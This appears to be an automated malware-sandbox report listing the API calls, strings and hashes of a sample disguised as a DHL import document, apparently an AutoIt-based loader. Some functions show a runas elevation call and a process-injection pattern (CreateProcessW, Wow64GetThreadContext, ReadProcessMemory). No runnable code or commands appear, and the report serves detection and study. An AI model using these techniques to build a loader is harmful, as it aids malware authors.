GetCurrentProcess.KERNEL32(?,0057CB64,00000000,?,?), ref: 004E4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 004E4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 004E4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004E4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 004E4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 004E447B
GetSystemInfo.KERNEL32(?,?,?), ref: 004E44A0

Strings

GetNativeSystemInfo, xrefs: 004E4460
kernel32.dll, xrefs: 004E444F
|O, xrefs: 005236F8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 3ae768ad61268ed0a7440f75f812b6197f8eb447fbe33df5a07d9d1f5f5cb603
Instruction ID: 25980be437739a18b51b664a9b24a6622929644e8c53a8b86fd9f5c036641aba
Opcode Fuzzy Hash: 3ae768ad61268ed0a7440f75f812b6197f8eb447fbe33df5a07d9d1f5f5cb603
Instruction Fuzzy Hash: 03A1D56190ABD0CFCBD1C76978611953FE47B76340B984EA9D041937A1F228660DFB2E

Function 004E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004E50AA,?,?,00000000,00000000), ref: 004E42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004E50AA,?,?,00000000,00000000), ref: 004E42C9
LoadResource.KERNEL32(?,00000000,?,?,004E50AA,?,?,00000000,00000000,?,?,?,?,?,?,004E4F20), ref: 005235BE
SizeofResource.KERNEL32(?,00000000,?,?,004E50AA,?,?,00000000,00000000,?,?,?,?,?,?,004E4F20), ref: 005235D3
LockResource.KERNEL32(004E50AA,?,?,004E50AA,?,?,00000000,00000000,?,?,?,?,?,?,004E4F20,?), ref: 005235E6

Strings

SCRIPT, xrefs: 004E42BF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 651f3e7de308efc6cbf4909fe1ba3a6dcd06383acddf6d52891b57bd092554b0
Instruction ID: a6c97e77176303d860adc2b321932a3d4963baa974cb94c54b59210a22984f3b
Opcode Fuzzy Hash: 651f3e7de308efc6cbf4909fe1ba3a6dcd06383acddf6d52891b57bd092554b0
Instruction Fuzzy Hash: 38117C74200700BFD7218B66EC48F277FB9EBD5B92F1481AEF50A962A0DB71D844A620

Function 00522BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 004E2B6B

Part of subcall function 004E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005B1418,?,004E2E7F,?,?,?,00000000), ref: 004E3A78

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,005A2224), ref: 00522C10
ShellExecuteW.SHELL32(00000000,?,?,005A2224), ref: 00522C17

Strings

runas, xrefs: 00522C0B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: d4a7a0e097dc016f7719fb855b4d1e8af2b3e835cd92b61c882a460664fc61e7
Instruction ID: 80907476f7e71b00777422fbd52e6ee960c3afeb2c8beac38b9d6bddc4bd0501
Opcode Fuzzy Hash: d4a7a0e097dc016f7719fb855b4d1e8af2b3e835cd92b61c882a460664fc61e7
Instruction Fuzzy Hash: 1F1105315082816ECB15FF23D855DAE7BA8AFA1747F44082EF042030A2DF689A49D71A

Function 004EBF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#[, xrefs: 005307CE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#[
API String ID: 3964851224-3919597151
Opcode ID: 387f1eb2c2d257ad9a6202302dc3c81e5e48741d8754417769cb1013ad00a06f
Instruction ID: 1f4ccbd2dd1e61eef0d693af29eb741a390a5dda1fdeb727567dcba87caff7a3
Opcode Fuzzy Hash: 387f1eb2c2d257ad9a6202302dc3c81e5e48741d8754417769cb1013ad00a06f
Instruction Fuzzy Hash: D3A27C706083419FC714DF19C4D0B2ABBE1BF89304F14896EE99A8B392D735EC46CB96

Function 004ED730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004ED807
timeGetTime.WINMM ref: 004EDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004EDB28
TranslateMessage.USER32(?), ref: 004EDB7B
DispatchMessageW.USER32(?), ref: 004EDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004EDB9F
Sleep.KERNEL32(0000000A), ref: 004EDBB1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 0398ca196baa1ce1cd2d2f00288bc7d18ef62fb96bb8afcf46d169d9d3ffe2bb
Instruction ID: 5bb77293bc7b9f0b1f4dc3ccb0c117eae58df032aa6b69edc777dacb45db8f58
Opcode Fuzzy Hash: 0398ca196baa1ce1cd2d2f00288bc7d18ef62fb96bb8afcf46d169d9d3ffe2bb
Instruction Fuzzy Hash: 12422570A08781DFD724CF26C894B6ABBE0BF45305F14462EE4568B391D778EC48DB9A

Function 004E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004E2D07
RegisterClassExW.USER32(00000030), ref: 004E2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004E2D42
InitCommonControlsEx.COMCTL32(?), ref: 004E2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004E2D6F
LoadIconW.USER32(000000A9), ref: 004E2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004E2D94

Strings

+, xrefs: 004E2CF0
TaskbarCreated, xrefs: 004E2D37
0, xrefs: 004E2CE9
AutoIt v3 GUI, xrefs: 004E2D23

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3030822ad52b178932527171c292884c8951b0aacd5915e9db35ed83c4b2aafe
Instruction ID: 0e39ed4855483f2ae798934a1f0610b19b6846dde9db9437e6ab53efc15e373f
Opcode Fuzzy Hash: 3030822ad52b178932527171c292884c8951b0aacd5915e9db35ed83c4b2aafe
Instruction Fuzzy Hash: B22113B0901348AFDB80DFA4EC59BDDBFB4FB18701F00821AF615A62A0D7B01588EF94

Function 0052065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0052039A: CreateFileW.KERNELBASE(00000000,00000000,?,00520704,?,?,00000000,?,00520704,00000000,0000000C), ref: 005203B7

GetLastError.KERNEL32 ref: 0052076F
__dosmaperr.LIBCMT ref: 00520776
GetFileType.KERNELBASE(00000000), ref: 00520782
GetLastError.KERNEL32 ref: 0052078C
__dosmaperr.LIBCMT ref: 00520795
CloseHandle.KERNEL32(00000000), ref: 005207B5
CloseHandle.KERNEL32(?), ref: 005208FF
GetLastError.KERNEL32 ref: 00520931
__dosmaperr.LIBCMT ref: 00520938

Strings

H, xrefs: 005208BD

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 18fd6a407e334e7f20e1b861fab1983a9f5882990eec3c710cbb32ee5e1d724e
Instruction ID: 781cd3c815da139f2d2c5c2b7c1dfa3558d71ffb6f9d50a3157ba7a27a83873f
Opcode Fuzzy Hash: 18fd6a407e334e7f20e1b861fab1983a9f5882990eec3c710cbb32ee5e1d724e
Instruction Fuzzy Hash: 03A12332A001198FDF29AF68EC95BAE3FA0BF46320F141159F8159B2D2D7319856DB91

Function 004E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005B1418,?,004E2E7F,?,?,?,00000000), ref: 004E3A78

Part of subcall function 004E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004E3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004E356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0052318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005231CE
RegCloseKey.ADVAPI32(?), ref: 00523210
_wcslen.LIBCMT ref: 00523277
_wcslen.LIBCMT ref: 00523286

Strings

\Include\, xrefs: 004E3527
Software\AutoIt v3\AutoIt, xrefs: 004E3560
\, xrefs: 0052328C
Include, xrefs: 00523184, 005231C5

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: d7f37233493afa049ab747ff8e9370e413968972604527c6b399cb82b06e5e26
Instruction ID: bb866cb976066ad699fc4edff4677862b84f896628f77870eea54eb9a87819aa
Opcode Fuzzy Hash: d7f37233493afa049ab747ff8e9370e413968972604527c6b399cb82b06e5e26
Instruction Fuzzy Hash: 44719F714043419FC354EF26EC8586BBBE8FFA5744F504E2EF545831A0EB38AA48DB66

Function 004E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004E2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 004E2B9D
LoadIconW.USER32(00000063), ref: 004E2BB3
LoadIconW.USER32(000000A4), ref: 004E2BC5
LoadIconW.USER32(000000A2), ref: 004E2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004E2BEF
RegisterClassExW.USER32(?), ref: 004E2C40

Part of subcall function 004E2CD4: GetSysColorBrush.USER32(0000000F), ref: 004E2D07
Part of subcall function 004E2CD4: RegisterClassExW.USER32(00000030), ref: 004E2D31
Part of subcall function 004E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004E2D42
Part of subcall function 004E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 004E2D5F
Part of subcall function 004E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004E2D6F
Part of subcall function 004E2CD4: LoadIconW.USER32(000000A9), ref: 004E2D85
Part of subcall function 004E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004E2D94

Strings

AutoIt v3, xrefs: 004E2C2F
#, xrefs: 004E2C16
0, xrefs: 004E2C0F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: b05ba3620f6db5c810d27cd666a86e38e3c32508b5c1b0c62cb54606de4b552c
Instruction ID: cc8a09482e36c9635a9460def6292e95995804e16a8e947a7252907187747644
Opcode Fuzzy Hash: b05ba3620f6db5c810d27cd666a86e38e3c32508b5c1b0c62cb54606de4b552c
Instruction Fuzzy Hash: 57217C71E00314ABCB909FA6EC65AAD7FF4FB18B41F50051EE504A22A0E7B12548EF98

Function 004EB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004EBB4E

Strings

p#[, xrefs: 004EBB6B
p#[, xrefs: 00530263
p%[, xrefs: 004EBB32
p#[, xrefs: 0053024F
x#[, xrefs: 00530207
x#[, xrefs: 00530168
p#[, xrefs: 004EBA72
p%[, xrefs: 004EB8DC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#[$p#[$p#[$p#[$p%[$p%[$x#[$x#[
API String ID: 1385522511-107764780
Opcode ID: 4aeaea29398d2634571b935a1ca09a79793abd45213fd4936b07d7a19da18f5d
Instruction ID: 02bf59ab135762bd45286285b7fffe123930a1d11ed5f67408e1926389209bd7
Opcode Fuzzy Hash: 4aeaea29398d2634571b935a1ca09a79793abd45213fd4936b07d7a19da18f5d
Instruction Fuzzy Hash: 6232CD74A00249DFDB20CF56C8A4ABFBBB5FF44305F14845AE905AB3A1C778AD42CB95

Function 004E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,004E316A,?,?), ref: 004E31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,004E316A,?,?), ref: 004E3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004E3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,004E316A,?,?), ref: 004E3232
CreatePopupMenu.USER32 ref: 004E3246
PostQuitMessage.USER32(00000000), ref: 004E3267

Strings

TaskbarCreated, xrefs: 004E322D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 242fcedf2ff64d1369d47ef6b0970b58e55a0f33b032b54bb114f33a9ca336a0
Instruction ID: 01f54d534025977db54fc25e25928d6af540d984eb0e372b354d244c1c8fb5c5
Opcode Fuzzy Hash: 242fcedf2ff64d1369d47ef6b0970b58e55a0f33b032b54bb114f33a9ca336a0
Instruction Fuzzy Hash: 83418834200280A7DB561F7AAC1DBB93E58FB01343F40065FF602832E1CB38AE45A76E

Function 033E2608 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 033E26D9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 033E28FF

Memory Dump Source

Source File: 00000000.00000002.1660044699.00000000033E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 033E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: d71f6a5503e47b719ef887ff564166af336dff7d095f5b308b4ad28a33615c67
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: 58A11674E00219EBDB14DFA4C894BEEBBB9BF48305F248599E505BB2C0D7799A81CF50

Function 004E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004E2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004E2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,004E1CAD,?), ref: 004E2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,004E1CAD,?), ref: 004E2CCF

Strings

AutoIt v3, xrefs: 004E2C89, 004E2C8E, 004E2C8F
edit, xrefs: 004E2CAC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0621dd3de04482dd5963ef5391a9e578534a2a7f2cbeebffff9535eb8e4cb98f
Instruction ID: 402f11f3d52366b95f3ae1410fe35cbb2159649c41d1803a0665c2a3a18fa547
Opcode Fuzzy Hash: 0621dd3de04482dd5963ef5391a9e578534a2a7f2cbeebffff9535eb8e4cb98f
Instruction Fuzzy Hash: DBF030755402907AE7B007237C18E772EFDD7D6F50B54451DF904921A0DA612848FB74

Function 033E23F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 033E22E8: Sleep.KERNELBASE(000001F4), ref: 033E22F9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 033E2500

Strings

KMOICKZF24ZZ, xrefs: 033E2563, 033E2566

Memory Dump Source

Source File: 00000000.00000002.1660044699.00000000033E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 033E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateFileSleep
String ID: KMOICKZF24ZZ
API String ID: 2694422964-325745327
Opcode ID: 4d40abd05242197a3d127a1486b961e4876ba1afeb9c6f3a41ba83a3fe4b9d16
Instruction ID: 864d793f791beba6d37b4bf02ab894e36906d401f35adb57c7daa3c15e055ac7
Opcode Fuzzy Hash: 4d40abd05242197a3d127a1486b961e4876ba1afeb9c6f3a41ba83a3fe4b9d16
Instruction Fuzzy Hash: 81518131D04259DAEF10EBE4C995BEFBB79AF05300F048599E608BB2C0D6791B45CBA5

Function 004E3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004E3B0F,SwapMouseButtons,00000004,?), ref: 004E3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004E3B0F,SwapMouseButtons,00000004,?), ref: 004E3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,004E3B0F,SwapMouseButtons,00000004,?), ref: 004E3B83

Strings

Control Panel\Mouse, xrefs: 004E3B3E

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 796178afede4d55597509e92640c02dd3c7caa471b1885ba4c9847348cd2808b
Instruction ID: d534b4d3e670a5f65e756171a08690ceaa271ad067301c56eecaa8def4291c2b
Opcode Fuzzy Hash: 796178afede4d55597509e92640c02dd3c7caa471b1885ba4c9847348cd2808b
Instruction Fuzzy Hash: F9117CB1520208FFDB21CFA6DC48EAFBBB8EF04746B10445AF806D7211D231AF44A7A4

Function 033E12E8 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 033E1AA3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 033E1B39
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033E1B5B

Memory Dump Source

Source File: 00000000.00000002.1660044699.00000000033E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 033E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_33e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
